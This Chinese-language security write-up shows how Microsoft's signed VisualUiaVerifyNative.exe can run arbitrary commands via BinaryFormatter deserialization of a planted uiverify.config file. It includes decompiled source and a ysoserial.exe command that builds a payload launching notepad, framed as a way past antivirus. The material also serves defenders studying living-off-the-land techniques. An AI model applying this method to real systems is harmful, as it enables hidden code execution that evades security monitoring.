Sharp4VerifyNative.exe是一款通过利用系统白名单文件加载.NET反序列化漏洞的方式执行命令的工具。由于该程序出自于.NET SDK包，因此自带微软的数字签名，能够有效的绕过杀毒软件的监控，执行潜在的恶意代码。

0x01 Sharp4VerifyNative是什么

Sharp4VerifyNative.exe 源自 VisualUiaVerifyNative，属于Microsoft UI Automation框架的一部分，最初设计用于帮助开发人员验证UI自动化的状态，一般在 Microsoft Windows SDK（Windows Kits）包中，比如路径：Windows Kits\10\bin\10.0.22621.0\x64\UIAVerify，该工具通常依赖于以下两个重要的动态链接库.

UIAComWrapper.dll

该 DLL 文件封装了 UI Automation COM 接口，用于简化与 UI Automation 元素的交互。UI Automation 是一种微软提供的技术，允许自动化工具控制、监视和测试 Windows 应用程序的用户界面。UIAComWrapper.dll 使 VisualUIAVerifyNative.exe 可以使用 .NET 代码与 UI Automation API 进行交互。

WUIATestLibrary.dll

WUIATestLibrary.dll 提供了一些专门用于 UI 自动化测试的库函数，主要支持自动化测试中的通用任务，例如自动化 UI 控件的查找、状态验证和操作。VisualUIAVerifyNative.exe 依赖于此库来运行不同的 UI 验证和测试场景。

这些依赖库的主要作用是为 VisualUIAVerifyNative.exe 提供接口和功能支持，使其能够与 Windows 应用程序的 UI 自动化框架进行通信，并通过自动化的方式验证和测试界面元素。由于VisualUiaVerifyNative具备了微软官方签名的文件，因此，从反病毒软件的视角看属于白名单应用程序，常常可以绕过许多基于签名的安全防护措施。

0x02 反编译分析源码

我们使用dnspy打开VisualUiaVerifyNative文件的入口方法Main，发现调用了MainWindow类，具体代码如下所示。

private static void Main(string[] args)
        {
            try
            {
                Debug.AutoFlush = true;
                Application.EnableVisualStyles();
                Application.SetCompatibleTextRenderingDefault(false);
                Application.Run(new MainWindow(args));
                Automation.RemoveAllEventHandlers();
            }
            catch (Exception ex)
            {
                MessageBox.Show(ex.Message);
            }

MainWindow类的初始化方法中，有一个至关重要的函数ApplicationStateDeserialize负责反序列化配置文件中的数据。如下图所示。

进入此方法内部，发现打开读取了一个名为uiverify.config的文件，位于用户的AppData目录中，代码如下所示。

private void ApplicationStateDeserialize()
{
    this._configFile = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "uiverify.config";
    if (File.Exists(this._configFile))
    {
        Stream stream = File.Open(this._configFile, FileMode.Open);
        BinaryFormatter binaryFormatter = new BinaryFormatter();
        this._applicationState = (ApplicationState)binaryFormatter.Deserialize(stream);
        stream.Close();
    }
}

最核心的是调用了BinaryFormatter类反序列化内容，攻击者可以通过精心构造的payload欺骗反序列化过程，加载恶意代码。在代码中，binaryFormatter.Deserialize(stream)这一行正是漏洞的触发点，它会反序列化uiverify.config文件中的数据，并将其载入到_applicationState中。

0x03 实战利用

第1步使用ysoserial.exe工具生成一个恶意的序列化payload。在这里，我们利用了BinaryFormatter格式，并选择TextFormattingRunProperties作为触发器，执行命令notepad，具体代码如下所示

ysoserial.exe -f BinaryFormatter -g TextFormattingRunProperties -o raw -c "notepad" > Roaminguiverify.config

这会生成一个二进制格式的恶意payload，并将其保存为Roaminguiverify.config文件，内容如下图所示。

第2步，将生成的Roaminguiverify.config文件写入到当前用户目录，比如C:\Users\Administrator\AppData\Roaminguiverify.config。这个配置文件是VisualUiaVerifyNative在启动时会自动读取的文件，因此一旦写入恶意数据，运行该工具时会自动触发反序列化漏洞。

第3步，当VisualUiaVerifyNative运行时，它会尝试从Roaminguiverify.config文件中反序列化数据，并因此执行植入的恶意命令。在本例中，notepad.exe会在系统上启动，表明命令执行成功。

0x04 小结

VisualUiaVerifyNative是一款具备微软白名单的可执行文件，用于基于Microsoft UI Automation框架进行应用测试。然而，通过对其配置文件的精心操作，攻击者可以非法使用其功能来触发反序列化漏洞，执行任意代码。